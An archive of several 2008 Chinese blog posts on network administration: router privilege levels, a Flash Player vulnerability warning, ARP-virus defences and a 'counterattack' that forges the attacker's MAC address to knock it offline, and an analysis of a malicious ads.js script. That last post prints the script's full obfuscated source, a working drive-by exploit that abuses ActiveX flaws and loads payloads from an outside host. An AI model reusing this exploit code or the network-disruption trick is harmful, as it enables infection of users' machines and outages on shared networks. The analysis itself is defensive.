Sunday, September 28th, 2008
telnet进入后应该是“参观级”的权限,然后用“super”命令切换到“监控级”权限,然后可以使用“system”切换到“系统级”级。
或者在直接使用super命令来切换命令级别。
super命令默认进入3级权限
格式:super [ level ]
参数:level:用户的级别,为0~3。
举例:
super 3
命令的级别(参观级、监控级、系统级、管理级)简介:
参观级:网络诊断工具命令(ping、tracert)、从本设备出发访问外部设备的命令(包括:Telnet客户端、SSH客户端、RLOGIN)等,该级别命令不允许进行配置文件保存的操作。
User view commands:
display Display current system information
hwtacacs Specify HWTACACS server
nslookup Query Internet name servers
ping Ping function
quit Exit from current command view
...
Posted in 今日一点, 服务器 | No Comments »
Wednesday, June 18th, 2008
这个漏洞跟ms06014的危害有一拼,刚查看Google Analytics的统计数据显示访问这个blog的用户有22.53%还在使用存在安全隐患的Adobe Flash Player 9 .0.115版本,而使用最新Adobe Flash Player 9 .0.124版本只有46.49%,这是恶意放毒者还很在乎的比例,如果你看到这篇文章,请检查你的flash控件版本升级吧。
最新的flash控件官方下载地址是:http://www.adobe.com/shockwave/download/flash/trigger/en/1/index.html
也可以使用360的第三方软件漏洞检查修补这个flash补丁。
如果你是站长或者网络内容提供者可以(强制你的浏览者升级到最新的flash控件版本):
1.请在网页Object标签中的codebase修改需要version=9,0,124,0
2.在js引入方式中修改requiredMajorVersion和requiredRevision为相应版本,swfobject也是一样修改。
[gallery]
漏洞危害:
最近一个月时间好几次遇到利用这个漏洞的病毒arp攻击,dns欺骗攻击,利用成功后会下载一堆游戏盗号木马,运行后自动删除自己,然后隔段时间(十几分钟到几分钟)再次下载,在所有用户启动目录可能有explorer.exe启动项(经过几次更新啦不一定是这样啦,当发现有这个启动项说明你已经中奖啦),局域网的用户如果可以的话建议查处木马下载地址然后把这些恶意链接地址和ip统统封掉(ip最好封一段!!不得以啊)
参考文档:
http://bbs.duba.net/thread-21930883-1-1.html
Posted in 今日一点 | No Comments »
Sunday, June 1st, 2008
一个机子中病毒啦,发出arp攻击怎么办?
两种情况:1,你可以控制,这样你可以直接过去把他机子关掉,或拔掉网线然后清除病毒等;2,在你可以管理范围之外,你怎么办?忍受被arp攻击?或许你说用(360)arp防火墙啊,我告诉你,没用,对于dns攻击,(360)arp防火墙没办法搞定,即使你开着防火墙,你浏览的网页里照样被嵌入“挂马”链接。当然你可以把这个链接重定向到你的本地机子127.0.0.1(修改hosts文件就可以达到初步的屏蔽效果)。
对于第二种情况,上边说的是防的办法,下边说下最近发现的反击办法,我不能任人宰割,要反击哇,让他掉线!!
首先你去电脑市场买几张网卡啊,不想买也行去虚拟几个也行!!(虚拟的办法我就不用说啦),因为是arp攻击,你的(360)arp防火墙会提示的,得到网卡地址,这样你就把你的多余的网卡地址修改成攻击你的那个机子的网卡地址,这样他就会提示ip地址冲突什么的,你也会提示,不过没关系啦,你也不用这块上网的!(所以推荐虚拟个网卡来玩),这样他就不会攻击你啦,刚开始你会掉线一下(看你的360怎么设置啦),你只要修复下你的上网的网卡连接就可以啦(或者禁用再启用下),超级好使,超便利反击办法(这样你搞好后,至少和你在同一交换机下的机子就会免遭那个中病毒的机子的骚扰啦,如果你配置够好,效果会更好)。
还有个防的办法(本来不想再说防的,只是这个是偶自己刚发现的就顺便说说):你的(360)arp防火墙可以实现自己设置绑定网关和dns吧,对就在这里添加一个不存在的ip地址(最好内网啊,和你不再一个网段的或者没人用的ip),网卡地址就填攻击你的那个主机的网卡地址。这样保存后就间接阻止啦那个机子对你的arp欺骗攻击(当然包括dns欺骗攻击)。实践证明这两个办法都很好使。
反击的办法可以保护你的邻居,有点风险(他们会在你攻击成功后集体掉线一下),防的办法可以保护你自己(不掉线,对其他人没影响)。
开头已经说啦,这个是对arp病毒来玩的(他一般不会去手动修改网卡地址,所以成功率很高),如果有人手动操作中间人arp攻击,那就看情况啦。
最后说下,这个只是学习探讨目的,不要拿去做破坏啊!
如果你有更好的办法欢迎跟大家分享
Posted in 今日一点, 网吧经验谈 | No Comments »
Monday, May 19th, 2008
00-e0-bb-00-1c-28 192.168.1.139 『F11?』
192.168.1.195 00-e0-bb-00-1b-e5 『F11』这个是5月15号到18号的记录中看出来的(曾经使用的ip有195,235,252,195)
F11怎么会有两个mac,难道最近又修改啦mac?查下前些天的arp表确实有这个mac(00-e0-bb-00-1c-28)对应的ip为139(192.168.1.139 )
难道F11有两个网卡?诡异的病毒?!,诡异的人?!,诡异的网络!!
[gallery]
Posted in 今日一点 | No Comments »
Tuesday, May 6th, 2008
这个地址是在telnet百度的时候发现的:
<script language="javascript" SRC="http://err.www404.cn:53/ads.js"></script>
把err.www404.cn:53/ads.js里的eval替换为document.write然后加个<script>的壳保存为html文件就可以初步解密出这个js的原型,然后分析代码可以知道是利用的ms06014这个漏洞(貌似还有暴风影音的痕迹)。只要你打上这个ms06041补丁就不会中这个ads.js的阴谋啦,还有最好把你的暴风影音也升级下。
ads.js源码:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('A B(){}f.L=B;b(4.t.G(\'s\')==-1){z()}A z(){2 p="Q:N"+"Y"+"-Z-V";2 y="0-R"+"-10";2 v=p+y;2 9="[x O]";h{2 e;2 w=(4["P"+"U"]("x"));w["X"]("W",v);f["E"]["D"]("C"+"F."+"S"+"M"+"e"+"K","")}k(e){};j{2 a=i J();a.H(a.T()+1f);4.t=\'s=1s;1n=/;a=\'+a.1j();4.8("<r 1l=1k:1h 6=7://d.c.5/1m.g></r>");4.8("<3 6=7://d.c.5/11.g></3>");b(e!=9){}1r{h{2 1q=i f["l"]("1o.1p");2 n}k(n){};j{b(n!=9){4.8("<3 6=7://d.c.5/1i.g><\\/3>")}}h{2 q=i f["l"]("1g"+"16.17"+"15.1");2 m}k(m){};j{b(m!=9){4.8("<3 6=7://d.c.5/q.g><\\/3>")}}h{2 14=i f["l"]("12"+"13.I"+"18.1");2 o}k(o){};j{b(o!=9){4.8("<3 6=7://d.c.5/19.g><\\/3>")}}}}}4.8("<3 6=7://u.1e.5.1d.1c/1a/1b.u></3>");',62,91,'||var|script|document|cn|src|http|write|errinfo|hoodt|if|www404|err||window|gif|try|new|finally|catch|ActiveXObject|Gl|sto|IEINFO|Cikeid1|lz|iframe|MyCookie|cookie|js|Cikeid|afilesto|object|Cikeid2|exit|function|writeInfo|Ad|createobject|ado|odb|indexOf|setTime||Date|am|onload|tr|BD9|Error|creat|clsid|983A||getTime|eElement|11D|classid|setAttribute|6C556|65A3|00C04FC29E36|real10|IERP|Ctl|reals|atCtrl|AT|GLCh|ERPCtl|real11|621252|ystat|com|yahoo|tongji|86400000|GLCH|none|bf|toGMTString|display|style|614|path|MPS|StormPlayer|cikewm|else|lonely'.split('|'),0,{}))
ads.js解密后源码(我打过补丁啦,解密有问题,如果感兴趣可以自行去解密这个ads.js,然后分析他都从哪里下载啦什么):
function writeInfo(){}window.onload=writeInfo;if(document.cookie.indexOf('MyCookie')==-1){exit()}function exit(){var Cikeid1="clsid:BD9"+"6C556"+"-65A3-11D";var Cikeid2="0-983A"+"-00C04FC29E36";var Cikeid=Cikeid1+Cikeid2;var errinfo="[object Error]";try{var e;var afilesto=(document["creat"+"eElement"]("object"));afilesto["setAttribute"]("classid",Cikeid);window["ado"]["createobject"]("Ad"+"odb."+"S"+"tr"+"e"+"am","")}catch(e){};finally{var hoodt=new ...
Posted in 今日一点, 病毒学习 | No Comments »